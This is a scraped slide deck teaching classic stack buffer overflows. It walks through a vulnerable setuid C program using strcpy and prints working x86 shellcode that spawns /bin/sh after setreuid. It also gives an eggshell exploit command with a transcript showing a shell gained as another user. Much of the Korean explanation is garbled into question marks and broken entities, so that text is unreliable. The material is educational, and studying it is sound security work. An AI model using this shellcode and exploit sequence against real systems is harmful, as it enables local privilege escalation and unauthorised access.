Basic of Buffer Over Flow - PowerPoint PPT Presentation
Title:
Basic of Buffer Over Flow
Description:
Basic of Buffer Over Flow S.S.G Agenda Introduction Memory Structure Stack Structure while Example Target Program Ready & Attack Attack & Security ... – PowerPoint PPT presentation
Number of Views:121
Avg rating:3.0/5.0
Title: Basic of Buffer Over Flow
1
Basic of Buffer Over Flow
- S.S.G ???
2
Agenda
- Introduction
- Memory Structure
- Stack Structure while Example
- Target Program
- Ready Attack
- Attack Security
- Application of Overflow
3
Introduction
- Overflow ??
- ???, ?? ???????
- lt?? ??gt ?? ??, ???
- Buffer Over Flow ??
- ??? ????? ?? ???? ?? ?? ?? ??? ????? ???? ??? ??
???? ??? ??? ???? ?? - ltPhrack Magazine 49-14gt, Aleph One
4
Memory Structure
LOW
TEXT
- TEXT
- Program Code
- DATA
- Static Variable
- Global Variable
- HEAP
- Dynamic Allocation
- STACK
- Dynamic Varbiable
- Local Variable
DATA
HEAP
STACK
HIGH
5
Stack Structure
Memory LOW (0x08048000)
Stack HIGH
STACK
- LIFO(Last In First Out)
- PUSH
- POP
- SP(Stack Pointer)
- BP(Base Pointer)
PUSH
POP
C
B
Memory HIGH (0xbfffffff)
A
Stack LOW
6
Example Program
- include ltstdio.hgt
- void func(int a, int b, int c)
- int buf1
- char buf216
- void main()
- func(1, 2, 3)
- printf(Hello, World!\n)
7
Example Program
Memory LOW (0x08048000)
Stack HIGH
STACK
buf2
- include ltstdio.hgt
- void func(int a, int b, int c)
- int buf1
- char buf216
- void main()
- func(1, 2, 3)
- printf(Hello, World!\n)
buf1
Stack Frame Pointer
Return Address
1
2
Memory HIGH (0xbfffffff)
3
Stack LOW
8
Example Program
Memory LOW (0x08048000)
Stack HIGH
STACK
buf2
- main
- pushl 3
- pushl 2
- pushl 1
- call func
- addl 16, esp
- func
- pushl ebp
- movl esp, ebp
- subl 40, esp
- leave (pop ebp
- ret
buf1
Dummy
Stack Frame Pointer
Return Address
1
2
Memory HIGH (0xbfffffff)
3
Stack LOW
9
Target Program
- include ltstdio.hgt
- include ltstring.hgt
- void func(char str)
- char buf64
- strcpy(buf, str)
- void main(int argc, char argv)
- func(argv1)
- printf(Hello, World\n)
- argc, argv
- ????? ?? ? ? ??? ???? ??
- ex) ./target bang 1234
- argv 3
- argv0 target
- argv1 bang
- argv2 1234
- strcpy(dest, src)
- src? ???? ???? dest? ??
- ?? ??? ??
- overflow ??? ??
10
Target Program
- Setuid Bit ? ????
- Set User ID Bit(number 4000)
- chmod 4755 target (or chmod us)
- -rwsr-xr-x 1 level1 level1 target
- ? ?? ????? ? target? ??? ?
- level1 ????? ?? ?
- ex) passwd
- Redhat 9.0, Kernel 2.4.32, gcc 3.2.2-5
11
Target Program
- Lets Run program
- With a lot of A Character!!!
- Result Segmentation Fault
- Why??
12
Target Program
Memory LOW (0x08048000)
Stack HIGH
STACK
buf
- include ltstdio.hgt
- include ltstring.hgt
- void func(char str)
- char buf64
- strcpy(buf, str)
- void main(int argc, char argv)
- func(argv1)
- printf(Hello, World\n)
Dummy
SFP
RET
Memory HIGH (0xbfffffff)
str argv1
Stack LOW
13
Target Program
Memory HIGH
Memory LOW
./target perl -e 'print "A"x71'
64 Bytes 8 Bytes
4 Bytes 4 Bytes 4 Bytes
STACK
str argv1
RET
SFP
Dummy
buf
AAAAAAAAAAAAAAAAAAAAAAAAAAA\0 BBFFFFBF
BBFFFF08 BBFFFFBB
Stack LOW
Stack HIGH
Normal
14
Target Program
Memory HIGH
Memory LOW
./target perl -e 'print "A"x72'
64 Bytes 8 Bytes
4 Bytes 4 Bytes 4 Bytes
STACK
str argv1
RET
SFP
Dummy
buf
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 00FFFFBF
BBFFFF08 BBFFFFBB
Stack LOW
Stack HIGH
Overflow
15
Target Program
Memory HIGH
Memory LOW
./target perl -e 'print "A"x80'
64 Bytes 8 Bytes
4 Bytes 4 Bytes 4 Bytes
STACK
str argv1
RET
SFP
Dummy
buf
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA
AAAA BBFFFFBB
Stack LOW
Stack HIGH
Real Overflow
16
Target Program
- func pushl ebp
- movl esp, ebp
- subl 72, esp
- subl 8, esp
- pushl 8(ebp)
- leal -72(ebp), eax
- pushl eax
- call strcpy
- addl 16, esp
- leave
- ret
- main movl 12(ebp), eax
- addl 4, eax
- pushl (eax)
- call func
- addl 16, esp
- subl 12, esp
Memory LOW (0x08048000)
Stack HIGH
STACK
A A A A A A A A A
Dummy
SFP BFFFFFBF
RET BBFFFF08
Memory HIGH (0xbfffffff)
str
Stack LOW
17
Target Program
- func pushl ebp
- movl esp, ebp
- subl 72, esp
- subl 8, esp
- pushl 8(ebp)
- leal -72(ebp), eax
- pushl eax
- call strcpy
- addl 16, esp
- leave
- ret
- main movl 12(ebp), eax
- addl 4, eax
- pushl (eax)
- call func
- addl 16, esp
- subl 12, esp
Memory LOW (0x08048000)
Stack HIGH
STACK
A A A A A A A A A
0x41414141(??)
Dummy AAAA
SFP AAAA
RET AAAA
Memory HIGH (0xbfffffff)
str
Stack LOW
18
Shell Code
- ?? ????? ??
- include ltunistd.hgt
- void main()
- char shell2
- setreuid(3001, 3001)
- shell0 "/bin/sh"
- shell1 NULL
- execve(shell0, shell, NULL)
????
"\x31\xc0\x31\xdb\x31\xc9\x66\xbb \xb9\x0b\x66\x
b9\xb9\x0b\xb0\x46 \xcd\x80" "\xeb\x1f\x5e\x89\
x76\x08\x31\xc0\x88 \x46\x07\x89\x46\x0c\xb0\x0b
\x89\xf3 \x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31
\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/b
in/sh"
19
Attack Ready
- Segmentation Fault ??
- ??? ??
- ???? ???? ??? ?, ? ??? ??? ??? ?
- But, ??? ??? ????? ???
- ???? ? ?? ??? ???? ??? ???? ???? ??? ??? ??
Eggshell ??
20
Attack
- bash-2.05b ./egg 512 200
- Using address 0xbffffa60
- bash-2.05b ./target perl -e 'print
"A"x76'(printf "\x60\xfa\xff\xbf") - sh-2.05b id
- uid3001(level1) gid1000(guest)
groups1000(guest) - sh-2.05b
21
Attack V.S Security
- Non-executable Stack
- ? Return Into Libc
- ? Omega Project
- Stack Guard and Stack Shield
- ? Bypass Stack Guard and Stack Shield
- Random Stacks
- Exec Shield(????)
- ? Exec Shield ??
- strcpy(), strcat(), gets(), fscanf(), scanf(),
- sprintf() ? ?? ?? -gt strncpy() strncat() ??
- And so on
22
Application of Overflow
- Windows, Unix, Linux, Mac
- Local, Remote
- Web -gt ActiveX
- Heap Overflow
- Integer Overflow
- Frame Pointer Overwrite
Recommended
CrystalGraphics Presentations
